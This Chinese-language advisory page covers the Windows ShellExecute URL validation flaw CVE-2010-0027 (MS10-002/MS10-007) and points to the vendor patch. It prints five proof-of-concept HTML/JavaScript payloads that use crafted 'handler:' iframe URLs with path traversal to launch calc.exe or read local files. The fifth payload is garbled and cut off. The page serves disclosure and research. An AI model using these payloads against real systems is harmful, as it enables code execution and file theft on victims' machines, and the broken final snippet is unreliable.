Microsoft Windows ShellExecute()输入验证漏洞(MS10-002/MS10-007)

发表评论 (0) 查看评论

受影响系统:

Microsoft Windows XP SP3
Microsoft Windows XP SP2
Microsoft Windows Server 2003 SP2
Microsoft Windows 2000SP4

描述:

BUGTRAQ  ID: 37884
CVE ID: CVE-2010-0027

Microsoft Windows是微软发布的非常流行的操作系统。

IE浏览器等应用使用ShellExecute API函数处理文件。由于没有正确的对数据流执行验证,用户受骗跟随了恶意URL就可能导致绕过安全过滤执行本地系统上的二进制程序。

<*来源:Brett Moore (brett.moore@SECURITY-ASSESSMENT.COM
  
  链接:http://secunia.com/advisories/38501/
        http://marc.info/?l=full-disclosure&m=126574567400473&w=2
        http://lostmon.blogspot.com/2010/02/internet-explorer-7-8-url-validation.html
        http://www.microsoft.com/technet/security/Bulletin/MS10-007.mspx?pf=true
        http://www.us-cert.gov/cas/techalerts/TA10-040A.html
        http://www.microsoft.com/technet/security/bulletin/ms10-002.mspx?pf=true
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

############# PoC one #################
<html>
<iframe id="myIframe"
src="handler:handler#:../../../../C:\windows/calc.exe"></html>
################# EOF #################

############## PoC Two #############
<html>
<iframe id="myIframe"
src="handler:handler#:../../../../C:\our_txtfile.txt"></html>

############# EOF #################

############# PoC Three ###############
<html>
<iframe id="myIframe"
src="handler:handler#:../../../../C:\Users\Lostmon\Searches\Everywhere.search-ms">
</iframe>
</html>

############### EOF ###########

############# PoC four ##############

<html>
<head>
</head>
<body>
<script type="text/javascript">
function getContentFromIframe(iFrameName)
{
var myIFrame = document.getElementById(iFrameName);
var content = myIFrame.contentWindow.document.body.innerHTML;
alert(‘content: ‘ + content);

content = ‘change iframe content’;
myIFrame.contentWindow.document.body.innerHTML = content;
}
</script> <iframe id="myIframe"
src="handler:handler#:../../../../C:\Users\Lostmon\Searches\Everywhere.search-ms"></iframe>

<a href="#" onclick="getContentFromIframe(‘myIframe’)">Get the content</a>

</body>
</html>

##################### EOF #############################

########### PoC Five ######################
var contents;
var req;
req = new XMLHttpRequest();
req.onreadystatechange = processReqChange;
req.open(??GET??,
??handler:document.write%28’shit#:../../../../C:\Users\Lostmon\Searches\Everywhere.search-ms??,
true);
req.send(?

建议:

厂商补丁:

Microsoft
———
Microsoft已经为此发布了一个安全公告(MS10-002)以及相应补丁:
MS10-002:Cumulative Security Update for Internet Explorer (978207)
链接:http://www.microsoft.com/technet/security/bulletin/ms10-002.mspx?pf=true

发表评论?

0 条评论。

发表评论